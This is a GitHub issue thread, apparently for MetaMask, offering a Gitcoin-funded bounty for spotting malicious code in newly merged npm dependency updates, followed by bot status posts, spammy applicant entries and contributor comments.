Malicious Dependency Update Bug Bounty

[danfinlay]

This issue represents the latest bug bounty in the MetaMask bug bounty program.

We will pay out this issue and bounty to any user who is able to identify a dependency update we have merged that includes malicious code designed to illegitimately access user keys.

Since this bounty is only good for code we have merged but not yet deployed, to participate in this program it will be useful to be notified about our latest release candidates before they are published.

We have a new release candidate up with many new dependency updates ([introduced in this PR](I recommend the use of a dependency-diffing tool in particular for finding potential introduced vulnerabilities by this change, like npmfs.)), making it a prime candidate for this bounty. We are keeping this release candidate up for a full week, maximizing the opportunity that this bounty can be filled!:
#6698

NpmFS is a great tool for analyzing the differences between npm modules at two release versions, and could be useful in pursuing this bounty.

We have created a new twitter account, MetaMask Bot, for posting about pending releases, which should also be useful to interested bounty hunters. A simple IFTTT twitter notification can allow you to receive these updates via the messenging platform of your choice.

Happy Hunting!

[gitcoinbot]

Issue Status: 1. Open 2. Started 3. Submitted 4. Done

---

This issue now has a funding of 3000.0 DAI (3000.0 USD @ $1.0/DAI) attached to it.

• If you would like to work on this issue you can 'start work' on the Gitcoin Issue Details page.
• Want to chip in? Add your own contribution here.
• Questions? Checkout Gitcoin Help or the Gitcoin Slack
• $80,133.09 more funded OSS Work available on the Gitcoin Issue Explorer

[gitcoinbot]

Issue Status: 1. Open 2. Started 3. Submitted 4. Done

---

Work has been started.

These users each claimed they can complete the work by 316 years, 10 months from now.
Please review their action plans below:

1) fincrypchain001 has started work.

COMPLETE SELECT ETHEREUM ADDRES AUTOPAID LAIN TEMPAT SETIAP 50 ETHEREUM 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2 TO 0x7BC13FE91B6a355f85c13D8C89108d689c9E6fa7

Make dfrennce

Learn more on the Gitcoin Issue Details page.

[gitcoinbot]

Issue Status: 1. Open 2. Started 3. Submitted 4. Done

---

Work has been started.

These users each claimed they can complete the work by 313 years, 11 months from now.
Please review their action plans below:

1) fincrypchain001 has started work.

COMPLETE SELECT ETHEREUM ADDRES AUTOPAID LAIN TEMPAT SETIAP 50 ETHEREUM 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2 TO 0x7BC13FE91B6a355f85c13D8C89108d689c9E6fa7

Make dfrennce
2) fincrypchain001 has started work.

COMPLETE SELECT ETHEREUM ADDRES AUTOPAID LAIN TEMPAT SETIAP 50 ETHEREUM 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2 TO 0x7BC13FE91B6a355f85c13D8C89108d689c9E6fa7

Make dfrennce
3) sudeepb02 has started work.

Identify the dependency with malicious code
4) katwane has started work.

am planning to expand the network in an new era of generations.what are your thoughts on it??
5) iluvindio has started work.

I would like to learn and complete this task.
6) vstyler96 has started work.

Well, I will take a look and I will start looking for the problem.
7) chiro-hiro has started work.

Find the vulnerabilities packages I guess
8) mohsin491 has started work.

done with in time hope I will finish this work with in time.
9) bermolin02 has started work.

щдро згодлрг7щ help 500 dollars my khgvfhjj guinhgfikj cjhru
10) myphuong776 has started work.

okkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
11) omeryasindemirbas has started work.

to sum up the questions by making a generalization, to identify the solutions, and to overcome all the troubles in order.
12) recep9227 has started work.

N3 ise yaradığını ne kazandırdığını öğrenmek istiyorum

Learn more on the Gitcoin Issue Details page.

[aahutsal]

@danfinlay seems you've renewed that issue on Gitcoin. If so, how to get notified about new PRs needed to be checked?

[danfinlay]

@agutsal like the parent post says, we're posting pending release candidates to Twitter with metamask_bot.

[aahutsal]

Thanks. I'm not big fan of Twitter, that's why been looking for other ways to get notified. Will check now

[danfinlay]

You could use IFTTT to message you on another protocol upon our tweets?

[aahutsal]

Thanks. I'll think out something better I guess. Circle CI notifications would work better for me

[codenamejason]

Is this open still?

[danfinlay]

Yes, this bounty is open and available for payout if anyone can identify a malicious dependency.

[danfinlay]

Oh I can see why you'd ask, originally this was opened in response to many newly updated dependencies. That said, I think it's safe to leave open, as an encouragement for developers to scrutinize our code-base.

[aahutsal]

@danfinlay @kumavis @danjm @Gudahtt @whymarrh @Zanibas
got some time to look at it, if still actual.

[AgCaliva]

@danfinlay got some time to look at it, if still actual.

danfinlay never replies nothing, also its impossible to contact metamask team. There is no real bounties here, dont loose your time like i did.

[aahutsal]

@AgCaliva thanks. I'll try. The project is actively developed, and I hope someone will reply.

[Nana12345678910]

Thank you for fixing my issue

On Sat, 14 May 2565 BE at 12:38 am, Arsen A. Hutsal < ***@***.***> wrote: @AgCaliva <https://github.com/AgCaliva> thanks. I'll try. The project is actively developed, and I hope someone will reply. — Reply to this email directly, view it on GitHub <#6699 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AWVHH4V3TLHUDVO3QGCIDG3VJZSPBANCNFSM4HVZBW2A> . You are receiving this because you are subscribed to this thread.Message ID: ***@***.***>

-- Christina Vongphit iPhone